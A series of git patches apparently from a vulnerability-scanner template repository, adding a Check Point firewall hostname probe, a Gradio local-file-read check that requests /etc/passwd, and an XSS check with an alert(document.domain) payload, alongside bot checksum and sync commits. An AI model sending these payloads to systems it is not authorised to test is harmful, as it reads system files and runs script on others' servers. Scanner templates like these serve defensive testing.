200 From d0cfa246ab38b2a4021475f5dd814ba3f00dde19 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 15 May 2024 11:45:00 +0530 Subject: [PATCH 1048/1768] Create checkpoint-firewall-enum.yaml --- .../enumeration/checkpoint-firewall-enum.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 javascript/enumeration/checkpoint-firewall-enum.yaml diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml new file mode 100644 index 0000000000..057dee67e8 --- /dev/null +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -0,0 +1,37 @@ +id: checkpoint-firewall-enum + +info: + name: Check Point Firewall - Enum + author: pussycat0x + severity: info + reference: + - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/checkpoint_hostname.rb + metadata: + verfied: true + shodan-query: product:"Check Point Firewall" + tags: js,network,firewall,checkpoint,enum + +javascript: + - code: | + let packet = bytes.NewBuffer(); + let prob = "\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00" + data = packet.Write(prob) + const c = require("nuclei/net"); + let conn = c.Open('tcp', `${Host}:${Port}`); + conn.Send(data); + let resp = conn.RecvFullString(); + let regex = /CN=(.+),O=(.+?)\./i; + let match = resp.match(regex); + let fw_hostname = match[1]; + let sc_hostname = match[2]; + let result = (`Firewall Host: ${fw_hostname}, SmartCenter Host: ${sc_hostname}`); + result + + args: + Host: "{{Host}}" + Port: 264 + + extractors: + - type: dsl + dsl: + - response From 8ead1e34402d9c8305346210f96727fa15c380ef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 11:46:08 +0530 Subject: [PATCH 1049/1768] updated matcher type --- http/cves/2024/CVE-2024-1561.yaml | 25 ++++++++----------------- 1 file changed, 8 insertions(+), 17 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 1fe5e8dc1f..8540dc604a 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -1,7 +1,7 @@ id: CVE-2024-1561 info: - name: Gradio Applications - Unauthorized Local File Read + name: Gradio Applications - Local File Read author: Diablo severity: high description: | @@ -14,7 +14,6 @@ info: - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338 - https://github.com/DiabloHTB/CVE-2024-1561 - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561 - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N @@ -27,7 +26,7 @@ info: verified: true max-request: 3 shodan-query: html:"__gradio_mode__" - tags: cve,cve2024,intrusive,unauth,gradio,lfi + tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr flow: http(1) && http(2) && http(3) @@ -52,10 +51,7 @@ http: Host: {{Hostname}} Content-Type: application/json - {"component_id": "{{first-component}}", - "data": "/etc/passwd", - "fn_name": "move_resource_to_block_cache", - "session_hash": "aaaaaaaaaaa"} + {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"} extractors: - type: regex @@ -69,14 +65,9 @@ http: GET /file={{tmpath}} HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:[x*]:0:0:" - - - type: word - part: header - words: - - "text/plain" + - type: dsl + dsl: + - regex('root:.*:0:0:', body) + - 'contains(header, "text/plain")' + condition: and From a26347219b973ae910b6b6401ff7700dd64de9d9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 11:49:15 +0530 Subject: [PATCH 1050/1768] Update checkpoint-firewall-enum.yaml --- javascript/enumeration/checkpoint-firewall-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index 057dee67e8..982ee2a268 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -1,7 +1,7 @@ id: checkpoint-firewall-enum info: - name: Check Point Firewall - Enum + name: Check Point Firewall - Detect author: pussycat0x severity: info reference: From ece9db27aab81fbb387db897c0a55310159943b8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:20:05 +0000 Subject: [PATCH 1051/1768] Auto Generated New Template Addition List [Wed May 15 06:20:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 19bc997a04..d48e26f086 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml +http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml From 5ddb801fb3abcc27519602b8386ba6580deac148 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:20:20 +0000 Subject: [PATCH 1052/1768] Auto Generated Templates Checksum [Wed May 15 06:20:20 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 66c83d9ca8..d5069c2544 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3246,6 +3246,7 @@ http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe +http/cves/2024/CVE-2024-1561.yaml:88f4487990c9da0ee3fa98030c0a6693cd03a02b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d @@ -5385,7 +5386,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 -http/misconfiguration/installer/custom-xoops-installer.yaml:d616ad8b7ead738c10458cd6cabbf31fa18683dc +http/misconfiguration/installer/custom-xoops-installer.yaml:ee8a3bf092cb7c1efd90f278a5ad74e2f4442510 http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f @@ -8531,7 +8532,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cbad61704aa4d1d43cde2cb1311c497d8c317993 +templates-checksum.txt:41bccd8b074819b2345826bef5ec3aecd18f7a01 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ab4cbabbb9be6490998dfd1f2b689b93ec61928e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:20:54 +0000 Subject: [PATCH 1053/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 15a344e683..fdac2be272 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' From 78649433bb2cd3e03ea19ae87f2ecfcf2daedf11 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:21:50 +0000 Subject: [PATCH 1054/1768] Auto Template Signing [Wed May 15 06:21:50 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1561.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 8540dc604a..c46073a3cb 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -71,3 +71,4 @@ http: - regex('root:.*:0:0:', body) - 'contains(header, "text/plain")' condition: and +# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8fde9204f892b23dc54c1d7f2fb7d5a00aec5ed1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:22:02 +0000 Subject: [PATCH 1055/1768] Auto Generated New Template Addition List [Wed May 15 06:22:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d48e26f086..095c091f5d 100644 --- a/.new-additions +++ b/.new-additions @@ -31,3 +31,4 @@ http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +javascript/enumeration/checkpoint-firewall-enum.yaml From 99ff6a22c1f921a5efb5fcce846f1635b2a64d6a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:22:06 +0000 Subject: [PATCH 1056/1768] Auto Generated Templates Checksum [Wed May 15 06:22:06 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d5069c2544..dfe29c7d83 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8310,6 +8310,7 @@ javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f0 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 +javascript/enumeration/checkpoint-firewall-enum.yaml:0e7be7e66bef638119ebd165cdcbba627f7afa26 javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16 javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c @@ -8532,7 +8533,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:41bccd8b074819b2345826bef5ec3aecd18f7a01 +templates-checksum.txt:4e04f33105f206f3ed357d9cc0a527b85160a425 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b8b7e0aab1ac6fa52bea9310910d5e4e2d6ea299 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:22:51 +0000 Subject: [PATCH 1057/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index fdac2be272..1b448e2321 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -36,6 +36,7 @@ on: - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' + - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 20c1d758372fabd27654842b36cd803df5ec8d1a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:36:51 +0000 Subject: [PATCH 1058/1768] Auto Generated New Template Addition List [Wed May 15 06:36:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 095c091f5d..371632d392 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cnvd/2017/CNVD-2017-06001.yaml +http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml From 8d8805b371286279b22b42bb2c888d79609f23e1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:37:01 +0000 Subject: [PATCH 1059/1768] Auto Generated Templates Checksum [Wed May 15 06:37:01 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dfe29c7d83..791b312a3c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3069,6 +3069,7 @@ http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22 http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae +http/cves/2023/CVE-2023-35158.yaml:736994aa875632d631f35f70562fcf31dfa39196 http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 @@ -3246,7 +3247,7 @@ http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1561.yaml:88f4487990c9da0ee3fa98030c0a6693cd03a02b +http/cves/2024/CVE-2024-1561.yaml:a134c8864733abe3278ebb6cf67a54c36b6ae29f http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d @@ -8533,7 +8534,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4e04f33105f206f3ed357d9cc0a527b85160a425 +templates-checksum.txt:c488fa8d3caa90906ab4d210b4f7e1a22a2f4bce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e117bf4d5526630add4d1065a8867fdc464f40a2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:37:31 +0000 Subject: [PATCH 1060/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1b448e2321..63f48a1a6c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cnvd/2017/CNVD-2017-06001.yaml' + - 'http/cves/2023/CVE-2023-35158.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' From 9cdb270679af92ac47a1f419d0b443479f4c4c79 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:37:43 +0000 Subject: [PATCH 1061/1768] Auto Generated New Template Addition List [Wed May 15 06:37:43 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 371632d392..56f6d5f779 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cnvd/2017/CNVD-2017-06001.yaml +http/cves/2023/CVE-2023-29827.yaml http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml From 8327d283cd00010ff53e8e360896fd13e96ed8d8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:37:50 +0000 Subject: [PATCH 1062/1768] Auto Generated Templates Checksum [Wed May 15 06:37:50 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 791b312a3c..3e7d2fe8de 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3010,6 +3010,7 @@ http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980 http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 +http/cves/2023/CVE-2023-29827.yaml:d6b8d8dd39ad77d513e00403c358db3dbb4ce073 http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8 http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5 @@ -8534,7 +8535,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c488fa8d3caa90906ab4d210b4f7e1a22a2f4bce +templates-checksum.txt:405f62cfd89c4d869b51412917c95bb6ea2c0011 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6c2ad6b93cd6db43deeb832bf17f1ac0fd5a69cf Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:38:24 +0000 Subject: [PATCH 1063/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 63f48a1a6c..a50431838e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cnvd/2017/CNVD-2017-06001.yaml' + - 'http/cves/2023/CVE-2023-29827.yaml' - 'http/cves/2023/CVE-2023-35158.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' From 56f19549d5d2ba231b510ea827d0b04c987fb2fa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:38:45 +0000 Subject: [PATCH 1064/1768] Auto Template Signing [Wed May 15 06:38:45 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35158.yaml | 1 + javascript/enumeration/checkpoint-firewall-enum.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 002255372b..cec2140f85 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -40,3 +40,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100c6c91bc1cafbd787223af97e5547530e8543d2a73bdc2cfb85cedd488a7e695b022006c285923b223b83c2a2d0b7436f826f8058fb22a2641e34fef6c20843b50804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index 982ee2a268..358c270263 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -35,3 +35,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a00483046022100ee7f1b386f2f382432b2846abb2832434819f68e200c9e7063099dead504f141022100f85c2860578d5e28ebc3fc651d9928447b42bcd28b5d510c7cf40223f8d5fd8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 75c4277fb972815e0fa9656159c9f8882dd3c81b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 12:12:04 +0530 Subject: [PATCH 1065/1768] minor update --- http/cves/2023/CVE-2023-44813.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 77040b15e1..88f1ab7886 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -32,14 +32,14 @@ info: http: - method: GET path: - - "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;'" + - "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'" matchers-condition: and matchers: - type: word part: body words: - - "initInviteFriendBtn('model');alert(1)//;" + - "initInviteFriendBtn('model');alert(document.domain)//;" - type: word part: header From b31b1a1a41e2753d5ab741fbbced9d611ab4ede2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:46:16 +0000 Subject: [PATCH 1066/1768] Auto Generated New Template Addition List [Wed May 15 06:46:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 56f6d5f779..3311911a44 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-29827.yaml http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml +http/cves/2023/CVE-2023-44813.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml From eff6a7313031ce0235f44eb7009ded92d91784a5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:46:26 +0000 Subject: [PATCH 1067/1768] Auto Generated Templates Checksum [Wed May 15 06:46:26 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3e7d2fe8de..d1c703ef35 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3070,7 +3070,7 @@ http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22 http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae -http/cves/2023/CVE-2023-35158.yaml:736994aa875632d631f35f70562fcf31dfa39196 +http/cves/2023/CVE-2023-35158.yaml:93718c34c9acb11a626e4076fe6f21953401b5a4 http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 @@ -3166,6 +3166,7 @@ http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 +http/cves/2023/CVE-2023-44813.yaml:799d537f93a6a047dd34ac0c099fee60ec58fdab http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 @@ -8312,7 +8313,7 @@ javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f0 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 -javascript/enumeration/checkpoint-firewall-enum.yaml:0e7be7e66bef638119ebd165cdcbba627f7afa26 +javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16 javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c @@ -8535,7 +8536,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:405f62cfd89c4d869b51412917c95bb6ea2c0011 +templates-checksum.txt:fc5915d967b1a21dcfd5a6b1d76d4dd1d5a43871 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7ebbcc7ac1a502e889aa8e6a22ac18180c619c2e Mon Sep 17 